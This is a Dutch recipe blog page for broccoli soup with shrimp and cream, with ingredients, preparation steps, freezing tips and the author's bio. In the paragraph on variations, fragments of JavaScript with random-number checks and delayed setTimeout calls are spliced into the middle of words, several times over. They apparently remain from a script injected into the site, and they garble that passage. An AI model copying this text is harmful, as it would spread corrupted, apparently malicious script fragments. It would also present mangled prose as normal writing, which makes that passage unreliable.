Broccoli soep met garnalen en room

Broccoli soep is eenvoudig om te maken en oh zo lekker. Heerlijk op een zondag middag op de bank, als voorgerecht of in een klein amuse glaasje. Je kunt er eigenlijk alle kanten mee op.

Een lekkere basis van Broccoli soep

Eigenlijk kun je dit recept eenvoudig om dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toveren dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een compleet andere soep. Dit kun je bijvoorbeeld al doen door in plaats van garnalen, gerookte zalm of kip te gebruiken. Roer als je zalm gebruikt een flinke hand met fijngehakte verse dille dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe en als je voor kip kiest een grote lepel groene pesdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. De room vind ik eigenlijk in alle gevallen een heerlijke aanvulling. Zo creëer je in een handomdraai een compleet andere soep.

Soep invriezen

Soep kun je heel goed invriezen en een paar maanden bewaren. Handige tip is om dit in niet al te grote porties te doen. Zo kun je ook tussendoor snel wat soep ontdooien. Ik heb ook wel gezien dat je dit kunt invriezen in ijsblokjes bakjes, zo kun je helemaal mooie porties maken. Persoonlijk vind ik dit nogal een gedoe. Ik ben vaak al lang blij als ik de juiste deksel kan vinden op een plastic bakje…

Broccoli soep met garnalen

Ben jij gek op soep? Bekijk dan ook eens deze andere heerlijke soeprecepten

Recept

Voorbereiding: 45 min.

Ingredienten

 • 1 Kg Broccoli
 • 1 bouillon blokje vis
 • Boursin Cuisine
 • 2 uien
 • Bosui
 • 2 citroenen
 • 300 gram garnalen (ah natuurlijk meer...)
 • 2 teentjes knoflook

Aan de slag!

 1. Maak een liter bouillon.
 2. Snijd de broccoli (met steel) en kook deze gaar in de bouillon.
 3. Snijd de ui en fruit deze met wat olie en de knoflook aan en schep het uimengsel bij de bouillon. Houd overtollig olie in de pan, hier kun je zometeen de garnalen in bakken.
 4. Pureer de soep met een staafmixer tot een gladde massa.
 5. Pers de citroenen en voeg het sap toe, roer vervolgens goed door.
 6. Bak de garnalen in de overtollige olie.
 7. Snijd wat lente uitjes, deze kun je gebruiken voor de decoratie.
 8. Serveer de soep met ongeveer 1 grote eetlepel Boursin Cuisine, wat lente uitjes en de garnalen.

Score

 • Score 5.0

User Rating

0 (0 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Broccoli soep met garnalen en room"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.